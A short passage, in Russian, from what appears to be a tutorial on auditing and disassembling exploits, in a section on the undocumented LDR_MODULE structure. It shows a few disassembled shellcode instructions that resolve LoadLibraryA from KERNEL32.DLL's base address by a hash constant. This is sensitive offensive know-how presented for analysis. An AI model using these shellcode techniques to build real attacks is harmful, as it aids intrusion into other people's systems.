Аудит и дизассемблирование exploit'ов
         

недокументированная структура LDR_MODULE


Самая трудная часть позади. Теперь мы точно знаем, что EAX содержит базовый адрес KERNEL32.DLL. Продолжаем анализировать дальше.

seg000:00000079 5E                pop    esi           ; esi := &MyGetProcAddress

seg000:0000007A 68 8E 4E 0E EC    push   0EC0E4E8Eh    ; #LoadLibraryA

seg000:0000007F 50                push   eax           ; base of KERNEL32.DLL

seg000:00000080 FF D6                    call   esi           ; MyGetProcAddress



Содержание раздела